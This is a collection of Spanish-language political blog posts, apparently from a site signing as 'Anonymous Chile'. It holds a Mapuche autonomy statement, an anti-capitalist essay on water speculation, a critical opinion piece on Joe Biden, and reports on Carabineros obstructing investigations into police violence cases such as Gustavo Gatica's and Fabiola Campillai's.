A fortalecer la resistencia desde los territorios, el weichan, a trabajar y luchar por la reconstrucción Nacional mapuche.

Por territorio y autonomía para la Nación mapuche

Fuera forestales y demas inversiones capitalistas del wallmapu

Libertad a Daniel Canio y demas ppm.

Lof temulemu Traiguén

Lof pidenco lumaco

Lof yeupeko Vilcun

Comunidad temulemu chico

Comunidad llollowenko

Coordinadora arauko Malleco.. CAM..

El agua como objeto de lucro para el monopolio del imperio capitalista

Publicada el 12/08/2021 por Anonymous Chile

Cuanto más son esquilmadas las fuentes de agua por el modo de producción capitalista, más rentable es la especulación con la poca agua que va quedando.

Nueva dentellada del capitalismo transnacional contra el planeta: Hasta el agua cotiza en bolsa

Ante la perspectiva del gigantesco lucro que conlleva especular con el agua, los tiburones del capitalismo han afilado sus dientes: el agua empezó a cotizar en bolsa en Wall Street en la primera semana de diciembre 2020. El cinismo de los que convierten al planeta en tristes lingotes atesorables, ataúdes de lo que antaño fue vida, es desmedido: aducen, para perfumar esta nueva rapiña, que la especulación con el líquido que es la base de la vida en la Tierra, podría permitir una mejor “gestión” del mismo; la realidad es que cuanto más son esquilmadas las fuentes de agua por el modo de producción capitalista, más rentable es la especulación con la poca agua que va quedando.

Según Naciones Unidas, 2.000 millones de personas padecen graves problemas de acceso al agua en el mundo, 297 000 niños menores de cinco años mueren cada año debido a enfermedades causadas por las malas condiciones sanitarias relacionadas con la carencia de agua y la ingesta de agua no potable, más de la mitad de la población mundial (4.200 millones de personas) carecen de servicios de saneamiento gestionados de forma segura. Se estima que en los próximos años dos tercios del planeta podrían padecer escasez de agua y millones de personas más serán desplazadas por esa carencia.

La brutal depredación de la naturaleza es consustancial al modo de producción capitalista: el agroindustrial intoxica la tierra, la megaminería devasta montañas y ríos, toda la producción del sector primario es orientada aberrantemente hacia el lucro en desmedro de la naturaleza (incluyendo en ella a los seres humanos), la atroz tortura de animales y trabajadores en la cadena de producción alimentaria obedece al modelo de producción capitalista (los animales padecen hacinamiento al punto de verse atrofiados, se les inyectan hormonas de crecimiento para engordarlos artificialmente porque son vistos como meras “mercancías”). El modelo es tan perverso que incluso los productores tiran a la basura toneladas de carne y demás alimentos con tal de “mantener los precios” y por lo tanto el lucro de un puñado: al menos un tercio de la producción alimentaria es desechado (esto en un mundo en el que millones de personas mueren de física hambre). La producción industrial es en su gran mayoría destinada al sobreconsumismo parasitario teledirigido, los inventos tecnológicos son implementados en gran medida para esclavizar y controlar y no para la emancipación, la constante producción armamentística también es consustancial a un sistema depredador en el que las guerras imperialistas son un mecanismo clave de acumulación capitalista por despojo.

El modo de producción agrícola capitalista envenena la tierra y el agua y malgasta el 70% de la extracción mundial de agua (FAO). El 75% de todas las extracciones de agua industrial se utilizan para la producción de energía bajo un sistema que impone el sobreconsumismo mediante mecanismos tan perversos como el bombardeo publicitario o la obsolescencia programada (mecanismo de envejecimiento prematuro de las cosas, implementado adrede desde la misma producción para que cada cosa dure un tiempo muy inferior al que podría durar).

La explotación excesiva del recurso hídrico por el modo de producción capitalista en el sector primario y la industria esencialmente (seguido -de lejos- por el consumo humano en uso doméstico), así como el cambio climático inherente al saqueo del planeta, han llevado a que el agua sea cada vez más escasa. Grandes multinacionales vinculadas a la gestión del agua, en muchos de los países que la han privatizado (como por ejemplo Chile), ya cotizan en bolsa, pero ahora se trata de subir un escalafón más en los niveles de depredación capitalista, pues se trata del agua como recurso vital que se somete al funcionamiento del “mercado”. El precio del agua fluctuará como lo hacen el petróleo, el oro o el trigo, informa el CME Group.

Millones de personas son privadas del acceso al agua potable en el mundo, por causa de multinacionales que desvían ríos enteros para sus explotaciones de megaminería, por causa del envenenamiento de las napas freáticas, por causa del saqueo capitalista. Un ejemplo paradigmático es el caso de la mina de carbón a cielo abierto más grande del mundo, la mina del Cerrejón, explotada por las multinacionales BHP Billiton, Angloamerican y Glencore, en la Guajira, Colombia. Desde esa mina salen toneladas de carbón hacia EEUU y Europa para alimentar el sobreconsumismo -teledirigido- de las metrópolis capitalistas. Para esa explotación, las multinacionales desviaron todo un río, lo que causa ecocidio y genocidio: el pueblo Wayú está siendo diezmado por el capitalismo transnacional, privado de agua y por lo tanto de alimentos. La comunidad Wayú viene denunciando, desde hace años, el hambreamiento al que es sometida, así como los reiterados asesinatos de líderes indígenas que han elevado sus voces en defensa del agua y la vida. Ha denunciado al menos 14.000 niños fallecidos por desnutrición y enfermedades asociadas a la falta de agua potable.

Por el mundo abundan los casos de ecocidio y genocidio causados por el capitalismo transnacional: este sistema deja socavones donde un día hubo verdes bosques, cloacas donde hubo fuentes hídricas de las que manaba vida, fuerza a millones de personas a desplazarse de zonas ricas en recursos (y por lo tanto codiciadas) mediante masacres perpetradas por las herramientas militares y paramilitares obedientes a multinacionales y latifundio. Las herramientas de exterminio contra toda oposición al saqueo capitalista se articulan a Estados represivos mantenidos a punta de injerencia imperialista. El sistema se sostiene mediante la violencia constante contra los procesos de emancipación de los pueblos. El imperialismo europeo y estadounidense lleva décadas urdiendo golpes de Estado y guerras imperialistas por todo el mundo (cuando un gobierno no es totalmente arrodillado al saqueo transnacional), décadas fomentando planes de exterminio contra las y los revolucionarios (Plan Lasso, Plan Cóndor, Plan Baile Rojo, Plan Colombia, Plan Patriota, Plan México, etc.), décadas apuntalando regímenes genocidas como el colombiano, por citar un ejemplo paradigmático de régimen del Terror funcional al saqueo capitalista, mantenido a punta de masacres y exterminio contra la reivindicación social y política de la clase explotada.

El capitalismo transnacional perpetra un constante saqueo de América Latina, África y Asia, esquilmando la naturaleza y llevando los niveles de explotación y saqueo contra las poblaciones a los niveles más atroces: hasta la sangre de los hambreados es objeto de codicia, hasta los órganos de los niños son objeto de criminal rapiña, hasta los úteros de las mujeres son saqueados y los bebés comprados. Tras empobrecer por saqueo a millones de personas, ese mismo capitalismo transnacional crea fortalezas en torno al botín saqueado por las metrópolis capitalistas (como la Unión Europea, Estados Unidos, Australia, etc.): el imperialismo quiere succionar las riquezas, pero rechaza a las personas desposeídas por su rapiña, forzándolas a trayectos migratorios de espanto y a padecer esclavitud moderna si logran llegar. Millones de personas originarias de la periferia capitalista son arrinconadas, por causa de leyes de inmigración lesivas, a padecer las peores explotaciones en los países del centro capitalista, como trabajar a destajo en el agro industrial en condiciones laborales y de vivienda infrahumanas, o como verse abocadas a la explotación aberrante que es la prostitución. El saqueo de los cuerpos humanos está concatenado al saqueo capitalista de los territorios. Es el funcionamiento de un sistema criminal heredero de la Historia colonial y cuyo presente es la continuidad sangrante de un sistema de clases, en el que un puñado de multimillonarios agigantan sus fortunas sobre mecanismos de depredación.

La clase burguesa capitaliza mediante la explotación de la clase trabajadora y mediante el saqueo de la naturaleza. Es urgente dejar de creer en las estafas que utiliza el capitalismo para perpetuarse, como la fábula de un supuesto e imposible “capitalismo con rostro humano” o del supuesto e igualmente imposible “capitalismo verde”, fábulas que venden los medios de alienación masiva y los reformistas de toda laya, perpetuadores de este sistema.

Los burgueses fingen preocuparse por el cambio climático, pero no obstante sus discursos y cumbres, siguen vigentes todos los mecanismos de destrucción del medio ambiente, porque los políticos cuyas campañas son financiadas por los grandes capitalistas no les van a poner freno a sus financiadores (es la realidad concreta de la Dictadura del Capital que contradice la fábula narcotizante de una supuesta “democracia” que es imposible en un sistema de clases). Para que un puñado de multimillonarios acumule más y más riqueza, sigue vigente la criminal obsolescencia programada; sigue también vigente la alienación masiva que perpetra la clase explotadora a través de sus medios de propaganda y publicidad, incitando incesantemente a la orgía de sobreconsumo que convierte al planeta en un basural. Incluso se incrementan los mecanismos depredadores: la especulación con los alimentos y con el agua es parte de esa depredación. Algunas cifras expresan la brutal injusticia social de este sistema: en el 2020, la fortuna del 1% de los más enriquecidos del mundo, equivalía ya a más del doble de la suma total con la que vive el 92% de la población del planeta (6.900 millones de personas). Los 2.153 mayores multimillionarios han acumulado, mediante la explotación y el saqueo, una fortuna mayor al dinero total con el que malviven las 4.600 millones de personas más empobrecidas del planeta. El capital acumulado por las 26 personas más enriquecidas del mundo equivale al presupuesto con el que malviven los 3.800 millones de personas más empobrecidas del mundo. El 1% más enriquecido de la población mundial ha sido responsable de más del doble de la contaminación por carbono que los miles de millones de personas que conforman la mitad más empobrecida de la humanidad, durante el cuarto de siglo en el que las emisiones han alcanzado niveles sin precedentes.

No hay solución a la devastación de la naturaleza dentro del capitalismo. Ante la tragedia palpable de islas de plástico flotando en los océanos, de la deforestación vertiginosa de los bosques, de los glaciares depredados, de las napas freáticas y ríos contaminados y desecados, de cordilleras rebanadas por la mega minería, del uranio empobrecido con el que el complejo militar industrial bombardea regiones enteras, de los millones de seres humanos empujados al éxodo, de las miles de especies exterminadas, el cinismo de los amos del mundo es descomunal. Como si plantearan lo siguiente:

No se puede tapar el sol con un dedo, ya es inocultable la devastación del planeta que los grandes capitalistas estamos perpetrando; ahora bien, lo que sí se puede hacer para seguir depredando y capitalizando, es mentir sobre las causas profundas y sistémicas del problema. Lo importante es que no se nos señale a nosotros como los responsables, que no se nos señale a los propietarios de los medios de producción, los que decidimos qué se produce, bajo qué condiciones y a qué ritmo, los que nos enriquecemos mediante el saqueo de la naturaleza y mediante la plusvalía que le sacamos a la clase trabajadora, los que decidimos cómo debe comportarse la población, ya que la inducimos al sobreconsumo que nos enriquece a nosotros y la inducimos a no cuestionar a este sistema que tanto nos conviene a nosotros como minoría dominante. El fingir que nos preocupa el planeta, dará muy buenos réditos, basta con una buena operación de propaganda a nivel mundial, algo que no nos cuestione como clase dominante y que no cuestione este sistema.

Los voceros políticos proponen tiritas para la gangrena, medidas cosméticas: en vez de prohibir la obsolescencia programada, te invitan a llevarte una bolsa de tela para tus compras (o a comprar las bolsas de plástico), te proponen espejismos de «soluciones» siempre individuales, nunca se ataca el meollo del problema. Pero por muy buena voluntad que tengamos a nivel individual, frenar la depredación capitalista requiere de una toma de consciencia de la raíz del problema -no solamente de sus síntomas-, requiere de una lucha colectiva. La gangrena no se cura con cosmética, y obviamente la depredación del planeta no se frenará con los placebos que el mismo sistema ofrece para encausar el descontento social hacia callejones sin salida.

La burguesía instala, a través de sus medios, la idea fatalista de «el ser humano es malvado por naturaleza», para obviamente evitar ser señalada como la depredadora que es, para sembrar el inmovilismo y el «sálvese quien pueda». En el discurso del “GreenWashing” (lavado de cara verde del sistema) se culpabiliza a todos por igual, y al final “si todos somos culpables, nadie lo es de manera específica”: una manera perversa de no señalar a los principales responsables de esta barbarie. Se equipara la depredación que cometen los grandes capitalistas, las gigantescas empresas que secuestran ríos enteros para la mega minería, con los pueblos que son sus víctimas. Se equipara a víctimas con victimarios en ese abyecto discurso del “todos somos culpables”, que no hace distinción alguna, ni de clases sociales, ni entre el puñado de países que consumen el 80% de los recursos del planeta (Estados Unidos, Europa, Canadá, Japón, Australia y demás metrópolis capitalistas) y todos los demás países del mundo (la inmensa mayoría) que sobreviven con el 20% restante de los recursos. En el discurso de la Máscara Verde no se habla de metrópolis capitalistas que sobreconsumen, versus periferias capitalistas que son concebidas por el capitalismo transnacional como meras «bodegas de recursos» y saqueadas hasta la médula, con un impacto ecológico devastador y un impacto social de empobrecimiento letal, tampoco se dice que el saqueo es perpetrado asesinando a toda persona o comunidad que alce su voz contra el saqueo capitalista.

Los medios no dicen que es el sistema socio económico que beneficia a sus dueños en desmedro de las mayorías, el que origina esta devastación del planeta (en la que también son depredados los seres humanos, explotados e intoxicados, alienados, enajenados de toda empatía y de toda relación de armonía con la naturaleza). “La producción capitalista distorsiona la interacción metabólica entre el ser humano y la tierra. (…) La propiedad de la tierra a gran escala reduce la población agrícola a un mínimo constantemente decreciente, confrontado con un constante crecimiento de la población industrial conglomerada; de esta manera, produce las condiciones que provocan una fractura en el proceso interdependiente entre el metabolismo social y el natural”, escribía Marx. «El capitalismo tiende a destruir sus dos fuentes de riqueza: la naturaleza y el ser humano». Sin duda el concepto de la “fractura metabólica” causada entre la naturaleza y los seres humanos por el modo de producción capitalista, es fundamental para lograr una crítica integral al capitalismo y para profundizar en una ecología radical y eficaz.

El saqueo de la naturaleza y la barbarie de explotación contra la clase trabajadora, las guerras imperialistas, el empobrecimiento por saqueo capitalista que produce éxodos masivos, la alienación masiva (promoción del racismo, la misoginia, el individualismo, el sobreconsumismo teledirigido, etc.), el feminicidio galopante, las enfermedades zoonóticas, la herramienta fascista de la burguesía, son inherentes al funcionamiento mismo del actual sistema. No solamente no es imposible otro sistema socio-económico, sino que es cuestión de supervivencia: luchar por abolir el capitalismo es un imperativo vital para la humanidad y para el planeta.

Biden: Ilusiones de cambio sin hechos concretos

Publicada el 12/08/2021 por Anonymous Chile

Joseph Biden viene precedido de una larga carrera política, en la que no ha sido precisamente el niño del coro, ni un ángel de la guarda. Queda por saber cual será su práctica en la presidencia del Imperio. Hay quien prefiere no hacerse muchas ilusiones….

En febrero de 2009, cuando recién se inauguraba el gobierno de Barack Obama, alarmado por las campanas que se echaban a volar ante la llegada a la Casa Blanca de un demócrata negro como adalid de la democracia, escribí un artículo que se tituló “No existe un imperio bueno”. El arribo del nuevo presidente fue saludado con tambores de victoria hasta por sectores progresistas, de izquierda y democráticos de América Latina y el Caribe que suponían que la refinada estirpe del académico de Harvard iba a marcar un profundo cambio respecto de la brutalidad y la barbarie de George W. Bush. Los resultados están a la vista. No hay mucho que decir.

Entre otras cosas, en aquel artículo señalaba que era “…evidente que la transición de un gobierno a otro en Estados Unidos ha significado un importante cambio de forma en su manejo internacional, pero es sumamente peligroso suponer que es posible que exista `un imperialismo bueno´”. Más adelante opinaba que “: La lucha por la paz y la democracia no nos puede llevar al desarme político e ideológico frente a un imperio que pareciera estar a la defensiva como fiera herida en su crisis, pero que no ha alterado un ápice su voluntad guerrerista y agresiva”.

En mi opinión estamos asistiendo a un nuevo canto de sirenas. Sobre todo en algunos medios de comunicación, ya no en aquellos bajo servicio imperial, sino en los que dan a conocer y divulgan opiniones y reflexiones que ayudan a comprender el devenir político desde una perspectiva popular y democrática, se vuelve a exaltar a Joe Biden y a su gobierno como algo bueno y esperanzador.

Ya ni siquiera se trata de ensalzar la sutileza de aquel académico encantador de serpientes cuyos asesores utilizaban el color oscuro de su piel como símbolo de lo nuevo, sobre todo en materia de política internacional. Ahora se trata de un genuino representante del establishment quien por casi 45 años ha pululado como sanguijuela silenciosa por los pasillos del poder en Washington. Joseph Robinette Biden Jr. fue senador durante 36 años y vicepresidente por 8.

Como senador, Biden fue miembro principal y posteriormente presidente de la Comisión de Relaciones Exteriores de la cámara alta. En esa responsabilidad apoyó la expansión de la OTAN hacia Europa del Este y una intervención militar más activa de Estados Unidos en la guerra de Yugoslavia durante la última década del siglo pasado. Así mismo, respaldó la resolución que autorizaba la guerra en Irak en 2002, cuando -según lo recogen diversos medios de prensa- su consejo fue decisivo a la hora de convencer al presidente Bill Clinton para utilizar la fuerza militar contra ese país. Incluso elaboró un plan para dividir Irak a partir de criterios sectarios, creando tres instancias, una chií, una suní y una kurda.

En 1982, Biden apoyó la posición inglesa en las islas Malvinas, afirmando: «es claro que el agresor es Argentina y es claro que Inglaterra tiene razón, y debería ser claro para todo el mundo a quién apoya Estados Unidos”. De la misma manera, tras los atentados del 11 de septiembre de 2001, instó al presidente a utilizar un gran contingente de tropas de su país en Afganistán

Como vicepresidente estuvo muy activo respaldando la intervención militar en Libia. De la misma manera, su equipo fue redactor de la ley que declaró a Venezuela como amenaza a la seguridad de Estados Unidos.

Esta “joyita” será el presidente de Estados Unidos a partir de la próxima semana. Resulta extremadamente peligroso y desmovilizador suponer que un hombre de rancio ADN imperialista pueda ser tan bueno como para celebrar su victoria como propia. Algunos medios y analistas incluso han caído en el error de considerar el cambio de administración en términos de gobierno, lo cual –desde mi modesto punto de vista- solo conduce a equívocos. Me parece que el estudio de los acontecimientos en Estados Unidos solo tienen validez para América Latina y el Caribe cuando se observan desde el punto de vista del sistema… y en eso, muy poco cambio habrá. Lo digo, tal como lo hice hace 8 años cuando las loas al presidente negro desbordaban emociones.

Con respecto a Estados Unidos, lo interesante es lo que está por ocurrir. Creo que todo lo que ha pasado en el último año desde que entre mayo y junio el manejo equivocado de la pandemia y la economía hicieron que las encuestas dejaran de favorecer al presidente Trump hasta el 6 de enero cuando se produjo el asalto al capitolio, ha estado orientado por la intencionalidad del presidente Trump de seguir siendo un actor protagónico en la dinámica política del país. Para ello se ha propuesto actuar desde dos escenarios por crear: el primero, arrebatarle el partido republicano al establishment para disputar bajo esa bandera las próximas elecciones parlamentarias de 2022 proyectando así su plan de futuro y en segundo lugar –si el primero no es posible- crear un tercer partido que destruya el bipartidismo sobre el cual está construido todo el entramado político y jurídico del Estado.

Esto último sería lo más peligroso, por eso tanto demócratas como algunos sectores republicanos están interesados en la aplicación de la Enmienda 25 de la Constitución o si no es aceptada por el vicepresidente Pence, realizar un impeachment que saque a Trump para siempre de la política. Al contrario de lo que se cree, la actuación de éste no ha estado encaminada a desconocer al Estado ni a negarse a entregar el poder, nunca han estado en su cabeza tales posibilidades. Lo único que ha hecho a través de la represión de los negros antes y de la movilización de sus seguidores para denunciar un supuesto fraude ahora, es acumular fuerzas y mostrar músculo movilizador para enviar un mensaje a fin de negociar desde una mejor posición. Lo que está sobre el tapete es dirimir si los 76 millones de votos obtenidos son de él o del partido republicano.

En el plano internacional, las duras sanciones contra Irán, han sido una señal para el lobby sionista y la declaratoria de Cuba como país que fomenta el terrorismo, algo similar dirigido al poderoso lobby cubano de la Florida. De igual manera, su férrea voluntad de someter al gobierno de Venezuela, reflejan su intencionalidad de atraerse los millones que ha acumulado la rica comunidad venezolana de Miami. Ha visto que necesita votos, pero también dinero si quiere hacer política a futuro. Es obvio que está pensando en el porvenir, sino, no se podrían entender decisiones y medidas de última hora que está tomando de forma inédita por un presidente que se retira.

En el otro lado de la trinchera, Biden ha creado un gabinete multicolor, incorporando a las minorías y a los sectores sociales que lo llevaron a la presidencia. Se trata de disputarle el control del partido demócrata a las nuevas generaciones que ya deslastradas del liderazgo fallido de Bernie Sanders, se preparan para asaltar el poder en las próximas décadas.

La inteligencia del ex presidente Obama, quien es el actual “dueño” del partido demócrata después de arrebatárselo a los esposos Clinton, se manifiesta al haber diseñado un dúo gubernamental que mezcla la sordidez propia del establishment y la veteranía encarnada por Biden con la proyección futura de Kamala Harris, verdadera protagonista del proyecto Obama de largo plazo. En Kamala se concentran sus condiciones de mujer, negra y descendiente de inmigrantes que encarnan el éxito del “sueño americano”.

He ahí el verdadero escenario de mediano plazo en la confrontación interna futura en Estados Unidos. Biden, por su edad, su salud y por sus variadas evidencias de demencia senil son solo un intermedio necesario para llegar a batallas decisivas por el control político del país en una confrontación que indudablemente tendrá poderosa influencia más allá de las fronteras imperiales.

Es muy probable que el nuevo gobierno signifique cambios internos importantes para Estados Unidos, en el escenario internacional también los habrá, pero solo serán de forma, el talante imperialista, agresivo e intervencionista de Estados Unidos no cambiará ni un milímetro. Como hace 12 años atrás, recomiendo no hacerse ilusiones.

Carabineros de Chile o la práctica de la obstrucción

Publicada el 12/08/2021 por Anonymous Chile

A la violación generalizada de los derechos humanos, se le suma que en gran parte de estos procesos de investigación ha ocurrido obstrucción a la justicia, trayendo a la memoria numerosos casos en los cuales agentes del estado han implementado este tipo de prácticas, haciendo cada vez más común las acciones ilegales, alteraciones de pruebas, e irregularidades dentro de la institución.

El aumento de los casos de violencia y abuso de poder por parte de la policía uniformada en el último año, ha derivado en procesos de investigaciones sumarias y judiciales que involucran tanto a suboficiales como oficiales. A la violación generalizada de los derechos humanos, se le suma que en gran parte de estos procesos ha ocurrido obstrucción a la justicia, trayendo a la memoria numerosos casos en los cuales agentes del estado han implementado este tipo de prácticas, haciendo cada vez más común las acciones ilegales, alteraciones de pruebas, e irregularidades dentro de la institución.

Es en este complejo escenario de irregularidades, por parte del mismo organismo que jura cuidar y velar por el bienestar de la ciudadanía, que los casos más emblemáticos de la revuelta popular recuerdan los crímenes realizados por Carabineros que durante años se han vivido y que en estos últimos se han acentuado. La obstrucción a la justicia por parte de la institución cada vez se practica más, siendo avalada por parte de la elite política por acción o inacción.

Dos de los casos más emblemáticos ocurridos desde octubre del año pasado son el de Gustavo Gatica y Fabiola Campillai, los que dejaron al descubierto el exceso de violencia, abusos e irregularidades en la aplicación de los protocolos de carabineros.

El 8 de noviembre del 2019, Gustavo perdió la visión de ambos ojos, luego de que el teniente coronel Claudio Crespo (G-3) le disparara a la cara con su escopeta antidisturbios, funcionario que posteriormente decidió descargar en su computadora personal los videos de la cámara GoPro que portaba el día de los hechos antes de entregar los registros a la Policía de Investigaciones (PDI), manipulando evidencia esencial y faltando a los protocolos establecidos.

Diariamente los oficiales superiores de Carabineros fueron informados de los civiles heridos por medio de la información recogida por departamento de operaciones policiales OS1, según consta en el documento electrónico 103879764 emitido por el Director de Orden y Seguridad (DIOSCAR). Desde el 20 de octubre de 2019, cada vez que hubiesen incidentes las unidades territoriales tenían la obligación de proporcionar a dicho departamento información sobre “detenidos”, “civiles lesionados”, “carabineros lesionados”, “daños particulares”, “daños a la locomoción colectiva”, “daños a los vehículos fiscales”, “armas incautadas“ y el consumo de “disuasivos” etc.”, es decir que DIOSCAR tenía acceso a mucha información de los incidentes que estaban teniendo lugar a nivel operativo, incluyendo información sobre los heridos y el uso de escopetas. De acuerdo con los informes diarios recopilados por O.S.1, donde se ofrecen datos precisos sobre las lesiones contra civiles y las posibles violaciones de los derechos humanos, la cifra de dicha jornada en la que fue herido Gustavo Gatica, era muy inferior a la cifra de heridos totales que había contabilizado el Ministerio de Salud para el mismo período: 196 y 11.054 respectivamente.

El sumario administrativo interno de carabineros, por las lesiones a Gustavo Gatica iniciado el 11 de noviembre, da cuenta de los oficiales que habrían hecho uso de la escopeta en el sector de Plaza Dignidad el día 8 de noviembre de 2019, así también lo corrobora la bitácora de la central de radio. El fiscal interno de Carabineros a cargo de la investigación concluyó, el 9 de diciembre, que fueron ocho los funcionarios policiales que usaron una escopeta antidisturbios durante esa jornada: G-1, Grifo 6, Beta 3, Beta 4, jefe de Macul 33, cabo 1o GOPE, suboficial y sargento 1o de la Prefectura de Operaciones Policiales, sin embargo, hay múltiples falencias en la investigación.

Entre las omisiones del fiscal interno de carabineros, respecto a quienes habrían disparado su escopeta antidisturbios ese día en las intersecciones de las calles Carabineros de Chile con Dr. Corvalán, está la del teniente coronel Claudio Crespo G-3, actualmente procesado y sindicado como el autor de los disparos que cegaron a Gatica, quien se encontraba presente en el lugar y disparó 178 veces su escopeta con perdigones el cual, además, se encontraba en una de las posiciones posibles para herir a Gustavo. A pesar de esta información, Crespo, (G-3) no fue interrogado ni se revisó su cámara corporal.

Por otra parte, las transcripciones de las declaraciones de los funcionarios que estuvieron en el lugar de los hechos son prácticamente idénticas, lo que indica cierto grado de coordinación a fin de evitar responsabilidades legales o administrativas. La mayoría declaró de forma vaga que los manifestantes estaban arrojando «objetos contundentes que ponían en riesgo la vida», sin embargo el agente investigador no hizo preguntas de seguimiento para determinar detalles de las circunstancias reales que rodearon los sucesos. Registros oficiales de la policía uniformada da cuenta de más de 2.600 cartuchos de calibre 12 (compuestos de 12 balines de goma y metal cada uno) y más de 600 de calibre 37 (granadas de gas) disparados el 8 de noviembre en contra de manifestantes.

El informe “Ojos sobre Chile: Violencia Policial y Responsabilidad de mando durante el Estallido Social” realizado por Amnistía Internacional, reproduce la conclusión del sumario interno de Carabineros, el que establece que “no se puede definir quién habría realizado los disparos contra Gatica y que no existe certeza que la munición utilizada por Carabineros haya causado las lesiones oculares a Gatica”. Opinión contradictoria con el resultado del informe pericial balístico de la PDI a los balines extraídos del cuerpo de Gustavo que determina que se trata de “dos postas de color negro de 8 mm de diámetro, las cuales formaron parte de cartuchos para escopetas calibre 12, del tipo antidisturbios, los que son utilizados generalmente por las ramas de las Fuerzas Armadas y de Orden y Seguridad, según su reglamentación.”

A estas inconsistencias hay que agregar que los análisis realizados a las grabaciones de las cámaras de televisión y de las cámaras de la Policía en el lugar de los hechos tienen deficiencias analíticas, pues sólo se revisó una cinta de televisión y una cámara del cuerpo de policía, a pesar de que varios funcionarios presentes en el lugar de los hechos tenían a su disposición este equipo.

El sumario fue cerrado el 9 de diciembre, pero, tras la emisión en abril de 2020 en un canal televisivo de un video en el que se aprecia el momento en el que Gustavo es herido por disparos policiales, Carabineros informó que se había reabierto el sumario en virtud de la obtención de nuevos antecedentes. Finalmente, el 19 de junio de 2020, Carabineros dijo que un funcionario había sido dado de baja en relación con el caso por incumplimiento de protocolo administrativo, pero no por el ataque a Gustavo, ese funcionario sería Claudio Crespo, G-3, quien fue imputado como autor de las lesiones a Gustavo Gatica en agosto de 2019.

Caso parecido fue el de Fabiola Campillai, quien el 26 de noviembre del mismo año en la comuna de San Bernardo, perdió la visión de sus dos ojos, sufriendo daños neurológicos al ser impactada por una bomba lacrimógena lanzada directo a su cara. La investigación fue obstruída con las mismas prácticas por parte de funcionarios de la institución, negando, ocultando y acordando una misma declaración. Sin embrago y después de muchos meses, se dio a conocer un registro audiovisual que implica directamente al Capitán de Carabineros Patricio Maturana, por el hecho solo fueron desvinculados dos funcionarios ya que declararon hechos contradictorios de lo ocurrido y no se verifico el estado de salud de la víctima, omitiendo el procedimiento legal.

La investigación realizada, desmiente el parte policial que afirmó que se habían lanzado las bombas lacrimógenas porque habían sido atacados por manifestantes, por lo que se hizo uso inadecuado e injustificado del lanza granadas. Fundamental para el avance en la investigación fue la incautación del video de la cámara GoPro del capitán a cargo del operativo, cuyas imágenes dan cuenta de cómo habían ocurrido los hechos.

El 5 de marzo de 2020, ante la Fiscalía Nacional el capitán Maturana, señaló que “no hay certeza de que lo que le provocó la lesión haya sido una lacrimógena, pudo ser cualquier tipo de armamento, pudo ser antes o después, una piedra gigantesca o un martillo”. Posteriormente estas afirmaciones fueron desmentidas por dos informes de la Universidad de Chile y del Servicio Médico Legal donde se demuestra que el golpe es de un proyectil lanzado con lanza granada y que se trató de una escopeta de un tiro, que fue dirigido directamente a la cara de Fabiola. El 28 de agosto de 2020, la Fiscalía Nacional imputó al capitán Patricio Maturana como autor del delito de apremios ilegítimos con lesiones gravísimas en contra de Fabiola Campillai.

Estas prácticas no solo han estado masificadas en la práctica habitual de carabineros durante y posterior estallido social. El asesinato del comunero Mapuche Camilo Catrillanca, a manos de Carabineros de Chile, el 14 de noviembre del 2018 en Temocuicui por un impacto de bala en su cabeza, producida por el del sargento Carlos Alarcón Molina, no fue muy diferente al caso de Gatica y Campillai, ya que en esta ocasión también existieron procedimientos irregulares, complicando el normal procedimiento de las investigaciones, en el que nuevamente existió obstrucción.

El 14 de noviembre los funcionarios que participaron del procedimiento fueron interrogados, entregando falsos testimonios, asegurando que nadie portaba cámaras en el momento de los hechos que pudieran registrar lo sucedido, declaraciones que fueron respaldadas por la institución el 17 de noviembre, pero que al día siguiente fueron desmentidas por un anuncio del gobierno que confirmaba la existía de un video, que había sido destruido por los mismos funcionarios. A solo horas de la muerte de Camilo, se entregaron dos documentos oficiales donde se aseguró que las fuerzas policiales fueron atacadas, produciéndose un enfrentamiento y que Catrillanca muere al cruzarse en la línea de fuego.

Este informe fue desmentido por el fiscal Roberto Garrido, quien estableció que el “Resumen Ejecutivo” como el Parte N°01130 dan cuenta de hechos que nunca ocurrieron. No obstante, el 18 de noviembre del 2018, la fiscalía de la Araucanía decidió abrir una investigación por obstrucción a la justicia contra cuatro funcionarios que participaron del operativo ese 14 de noviembre, antes de ese día, el gobierno aseguraba que Catrillanca tenía relación con el hecho delictual de robo de los vehículos de tres profesores, ocurridos horas antes del asesinato.

Este tipo de hechos no solo aparecen ahora, si se retrocede un poco en el tiempo, hay casos como el de Jaime Mendoza Collío, quien el 12 de agosto del 2009 murió tras recibir un disparo por parte del cabo del Grupo de Operaciones Policiales (GOPE) de Carabineros Miguel Jara Muñoz, quien testifico que había sido por legítima defensa, aportando como prueba las marcas de balines en el chaleco anti balas que utilizo ese mismo día, posteriormente los peritajes del Servicio Médico Legal arrojaron que esto había sido falso, ya que Jaime Mendoza Collio recibió el disparo por la espalda mientras intentaba huir tras el ingreso de los funcionarios al fundo San Sebastián de Ercilla, lugar donde un grupo de comuneros Mapuches había ingresado como parte de su lucha reivindicativa de recuperación territorial.

Amnistía Internacional ha tenido acceso a cinco expedientes de investigación interna, en los cuales ha observado que en estos, lejos de intentar descubrir la verdad para aplicar medidas disciplinarias, están orientadas a absolver a funcionarios de Carabineros de responsabilidades legales o administrativas.

La reiteración de este tipo de prácticas dentro de Carabineros de Chile deja ver el respaldo y protección que reciben ante este tipo de actuar. Respaldo que parte desde los mismos integrantes de la institución hasta ciertos sectores de la política, existiendo encubrimiento y justificación al actuar de ciertos funcionarios. Un claro ejemplo fueron los dichos del ex Director de Carabineros Mario Rosas, durante el estallido social quien, lejos de sancionar los comportamientos violatorios, éstos fueron permitidos y respaldados por él, lo que se evidenció a través de la filtración del audio en el que asegura, que no daría de baja a ningún funcionario independientemente de su conducta.

Cómo ayuda la institución Carabineros de Chile a la delincuencia y narcotráfico en el país

Publicada el 12/08/2021 por Anonymous Chile

Al país le consta, también, que desde el término de la Dictadura (hace treinta años) la institución Carabineros de Chile no ha sido mayormente intervenida por las autoridades, después de que sus efectivos se caracterizaran por haber practicado el terrorismo de estado en delitos que hasta ahora conmueven a la población y que obtuvieron, finalmente, altos grados de impunidad.

El senador independiente Alejandro Guillier ha advertido a los chilenos sobre aquellos reiterados delitos cometidos por carabineros en relación a la extraña desaparición de su armamento personal y hasta de una asociación ilícita entre los uniformados para entregar o vender armas de fuego a delincuentes y narcotraficantes. Al mismo tiempo, denuncia que el gasto en la adquisición de municiones es demasiado alto y no existe un arqueo de lo que efectivamente se usa para realizar su labor “disuasiva” cuando, además, se sabe que esta policía decomisa más de doscientas armas ilegales que terminan “perdiéndose” en las bodegas de la institución sin registro alguno.

